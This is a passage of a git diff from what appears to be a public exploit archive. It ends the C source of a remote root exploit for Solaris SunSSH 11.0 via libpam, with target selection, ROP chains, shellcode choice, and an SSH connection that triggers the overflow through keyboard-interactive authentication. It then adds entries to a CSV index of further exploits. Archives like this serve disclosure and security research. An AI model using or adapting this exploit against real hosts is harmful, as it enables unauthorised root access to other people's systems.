itarg = rc; + } + break; + case 1: + printf("[-] chosen target '%s'\n",targets[rc].name); + retaddr = malloc(strlen(targets[rc].ropchain)+1); + if(retaddr){ + memset(retaddr,0,strlen(targets[rc].ropchain)+1); + memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain)); + itarg = rc; + } + break; + case 2: + printf("[-] chosen target '%s'\n",targets[rc].name); + retaddr = malloc(strlen(targets[rc].ropchain)+1); + if(retaddr){ + memset(retaddr,0,strlen(targets[rc].ropchain)+1); + memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain)); + itarg = rc; + } + break; + case 3: + printf("[-] chosen target '%s'\n",targets[rc].name); + retaddr = malloc(strlen(targets[rc].ropchain)+1); + if(retaddr){ + memset(retaddr,0,strlen(targets[rc].ropchain)+1); + memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain)); + itarg = rc; + } + break; + case 4: + printf("[-] chosen target '%s'\n",targets[rc].name); + retaddr = malloc(strlen(targets[rc].ropchain)+1); + if(retaddr){ + memset(retaddr,0,strlen(targets[rc].ropchain)+1); + memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain)); + itarg = rc; + } + break; + default: + printf("[!] Invalid target selection %d\n", rc); + exit(0); + break; + } + itarg = 1; + } + break; + case 'h': + printf("[!] Usage instructions.\n[\n"); + printf("[ %s (optional)\n[\n[ --server|-s \n",argv[0]); + printf("[ --port|-p (port)[default 22]\n[ --target|-t \n"); + printf("[ --shellcode|-x \n[\n"); + printf("[ Target#'s\n"); + for(i = 0;i <= targetno - 1;i++){ + printf("[ %d \"%s\"\n",i,targets[i]); + } + printf("[\n[ Shellcode#'s\n"); + for(i = 0;i <= shellno - 1;i++){ + printf("[ %d \"%s\" (length %d bytes)\n",i,shellcodes[i].name,strlen(shellcodes[i].shellcode)); + } + printf("\e[0m"); + exit(0); + break; + default: + break; + } + } + if(itarg != 1 || ihost != 1 || ishell < 0){ + printf("[!] error, insufficient arguments, try running '%s --help'\e[0m\n",argv[0]); + exit(-1); + } + rc = libssh2_init(0); + hostaddr = inet_addr(host); + sd = socket(AF_INET, SOCK_STREAM, 0); + sain.sin_family = AF_INET; + sain.sin_port = htons(port); + sain.sin_addr.s_addr = hostaddr; + if(connect(sd, (struct sockaddr*)(&sain),sizeof(struct sockaddr_in)) != 0) { + fprintf(stderr, "[!] failed to connect!\n"); + goto shutdown; + } + session = libssh2_session_init(); + libssh2_session_set_blocking(session, 1); + while((rc = libssh2_session_handshake(session, sd))==LIBSSH2_ERROR_EAGAIN); + if(rc) { + printf("[!] failure establishing ssh session: %d\n", rc); + goto shutdown; + } + nh = libssh2_knownhost_init(session); + if(!nh) { + printf("[!] failure on libssh2 init\n"); + goto shutdown; + } + fingerprint = libssh2_hostkey_hash(session, LIBSSH2_HOSTKEY_HASH_SHA1); + printf("[+] ssh host fingerprint: "); + for(i = 0; i < 20; i++) { + printf("%02x", (unsigned char)fingerprint[i]); + } + printf("\n"); + libssh2_knownhost_free(nh); + signal(SIGINT,&on_interrupt); + libssh2_userauth_keyboard_interactive(session, "", &kbd_callback); + printf("[!] exploit failed, core maybe on target!\n"); +shutdown: + if(sd){ + close(sd); + } + printf("\e[0m"); + return -2; +} \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 7875249b9..1bda1cfd5 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11231,6 +11231,7 @@ id,file,description,date,author,type,platform,port 49221,exploits/multiple/local/49221.java,"Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption",2020-12-09,"Thomas Sluyter",local,multiple, 49226,exploits/windows/local/49226.txt,"PDF Complete 3.5.310.2002 - 'pdfsvc.exe' Unquoted Service Path",2020-12-10,"Zaira Alquicira",local,windows, 49248,exploits/windows/local/49248.txt,"System Explorer 7.0.0 - 'SystemExplorerHelpService' Unquoted Service Path",2020-12-14,"Mohammed Alshehri",local,windows, +49259,exploits/linux/local/49259.c,"libbabl 0.1.62 - Broken Double Free Detection (PoC)",2020-12-15,"Carter Yagemann",local,linux, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -18340,6 +18341,7 @@ id,file,description,date,author,type,platform,port 49216,exploits/windows/remote/49216.py,"SmarterMail Build 6985 - Remote Code Execution",2020-12-09,1F98D,remote,windows, 49217,exploits/windows/remote/49217.py,"Dup Scout Enterprise 10.0.18 - 'sid' Remote Buffer Overflow (SEH)",2020-12-09,"Andrés Roldán",remote,windows, 49218,exploits/windows/remote/49218.txt,"Huawei HedEx Lite 200R006C00SPC005 - Path Traversal",2020-12-09,Vulnerability-Lab,remote,windows, +49261,exploits/solaris/remote/49261.c,"Solaris SunSSH 11.0 x86 - libpam Remote Root",2020-12-15,"Hacker Fantastic",remote,solaris, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -43476,3 +43478,6 @@ id,file,description,date,author,type,platform,port 49255,exploits/multiple/webapps/49255.txt,"Rumble Mail Server 0.51.3135 - 'username' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple, 49256,exploits/hardware/webapps/49256.py,"Macally WIFISD2-2A82 2.000.010 - Guest to Root Privilege Escalation",2020-12-14,"Maximilian Barz",webapps,hardware, 49257,exploits/ruby/webapps/49257.py,"Gitlab 11.4.7 - Remote Code Execution",2020-12-14,"Fortunato Lodari",webapps,ruby, +49258,exploits/php/webapps/49258.txt,"Task Management System 1.0 - 'page' Local File Inclusion",2020-12-15,"İsmail BOZKURT",webapps,php, +49260,exploits/php/webapps/49260.py,"Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (Authenticated)",2020-12-15,"Andrea Bruschi",webapps,php, +49262,exploits/hardware/webapps/49262.py,"Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)",2020-12-15,Freakyclown,webapps,hardware,